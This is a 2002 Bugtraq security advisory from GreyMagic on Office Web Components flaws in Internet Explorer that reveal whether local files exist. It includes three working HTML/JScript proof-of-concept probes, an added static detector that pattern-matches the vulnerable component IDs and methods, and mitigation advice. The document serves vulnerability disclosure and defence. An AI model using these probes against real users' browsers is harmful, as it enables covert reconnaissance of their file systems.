Bugtraq mailing list archives

Multiple local files detection issues with OWC in IE (GM#008-IE)


From: "GreyMagic Software" <security () greymagic com>
Date: Mon, 8 Apr 2002 17:22:34 +0200

GreyMagic Security Advisory GM#008-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm008-ie/.

Topic: Multiple local files detection issues with OWC in IE.

Discovery date: 25 Feb 2002, 05 Mar 2002.

Affected applications:
======================

* Office 2000 - Office Web Components 9, Chart component.
* Office XP - Office Web Components 10, Chart component.
* Office XP - Office Web Components 10, Spreadsheet component.
* Office XP - Office Web Components 10, DataSourceControl component.


Introduction:
=============

Office Web Components (OWC) is a group of safe-for-scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.


Discussion:
===========

There are several ways to check whether local files exist using OWC9 and
OWC10.

The first vulnerability is in the Chart component in both OWC9 and OWC10.
The "Load" method does not perform any security check on the assigned URL; it
throws an error when the given file name does not exist, and when no error is
thrown the file exists.

The second vulnerability is in the Spreadsheet component in OWC10. The
"XMLURL" property blindly follows redirections, so it is possible to assign
it a URL which redirects to a local file and determine whether it exists or
not by the error thrown. It is also possible to read properly formatted
WorkSheet XML files from disallowed locations in the same way.

The third vulnerability is in the DataSourceControl component in OWC10. The
"ConnectionFile" property does not perform any security checks on the
assigned URL. Therefore, it is possible to assign a local file and determine
whether it exists or not by the error thrown.


Exploit:
========

A simple exploit for the first vulnerability:

<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"
style="display:none"></object>
<!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
<script language="jscript">
onload=function () {
    try {
        oCS.Load("file://c:/test.txt");
        alert("File exists!");
    }
    catch (oErr) {
        alert("File does not exist.");
    }
}
</script>

A simple exploit for the second vulnerability, "getFile.asp" internally
redirects to "file://c:/test.txt":

<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oSP.XMLURL="getFile.asp";
    }
    catch (oErr) {
        alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" : "File does not exist.");
    }
}
</script>

A simple exploit for the third vulnerability:

<object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oDS.ConnectionFile="file://c:/test.txt";
    }
    catch (oErr) {
        alert(oErr.number==-2146697211 ? "File does not exist." : "File exists!");
    }
}
</script>
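
To spot pages that carry these probes, the following static detector (an added
example, not GreyMagic's code) flags <object> tags that instantiate one of the
four OWC CLSIDs listed above and script that touches the unchecked members
"Load", "XMLURL" and "ConnectionFile"; the sample HTML is constructed from the
first proof of concept.

```javascript
// Static detector for the OWC local-file probes described in this advisory.
// Added example (not GreyMagic's code); CLSIDs are those listed above.
const OWC_CLSIDS = {
  "0002E500-0000-0000-C000-000000000046": "OWC9 Chart",
  "0002E556-0000-0000-C000-000000000046": "OWC10 Chart",
  "0002E551-0000-0000-C000-000000000046": "OWC10 Spreadsheet",
  "0002E553-0000-0000-C000-000000000046": "OWC10 DataSourceControl",
};
// Members the advisory reports as applying no security check to the URL.
const RISKY_MEMBERS = ["Load", "XMLURL", "ConnectionFile"];
function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}
// One finding per <object> that instantiates an OWC component, listing which
// unchecked members the page's script touches and any file:// URLs found.
// A redirect-based probe (second issue) carries no file:// URL in the page,
// so a non-empty `members` list, not `fileUrls`, is the reliable signal.
function scanHtml(html) {
  const findings = [];
  const fileUrls = html.match(/\bfile:\/\/[^"'\s<>)]+/gi) || [];
  const tagRe = /<object\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const c = /\bclassid\s*=\s*["']?\s*clsid:([0-9a-f-]{36})/i.exec(attrs);
    if (!c) continue;
    const clsid = c[1].toUpperCase();
    if (!(clsid in OWC_CLSIDS)) continue;
    const idm = /\bid\s*=\s*["']?([\w$-]+)/i.exec(attrs);
    const id = idm ? idm[1] : null;
    const members = [];
    for (const member of id ? RISKY_MEMBERS : []) {
      // Matches e.g. `oCS.Load(` or `oSP.XMLURL =` anywhere in the page.
      const use = new RegExp("\\b" + escapeRe(id) + "\\s*\\.\\s*" + member + "\\s*[(=]");
      if (use.test(html)) members.push(member);
    }
    findings.push({ id, component: OWC_CLSIDS[clsid], clsid, members, fileUrls });
  }
  return findings;
}

// Constructed sample: the advisory's first proof of concept plus an unrelated object.
const SAMPLE_HTML = `
<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"></object>
<object id="oOther" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script language="jscript">
onload=function () { try { oCS.Load("file://c:/test.txt"); alert("File exists!"); }
  catch (oErr) { alert("File does not exist."); } }
</script>`;
```

Running scanHtml(SAMPLE_HTML) yields one finding for the OWC9 Chart object with
members ["Load"] and fileUrls ["file://c:/test.txt"]; the unrelated object is ignored.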


Solution:
=========

Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed and has opened an investigation regarding these
issues.


Tested on:
==========

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of these issues is available
at http://security.greymagic.com/adv/gm008-ie/.


Feedback:
=========

Please mail any questions or comments to security () greymagic com.

- Copyright © 2002 GreyMagic Software.

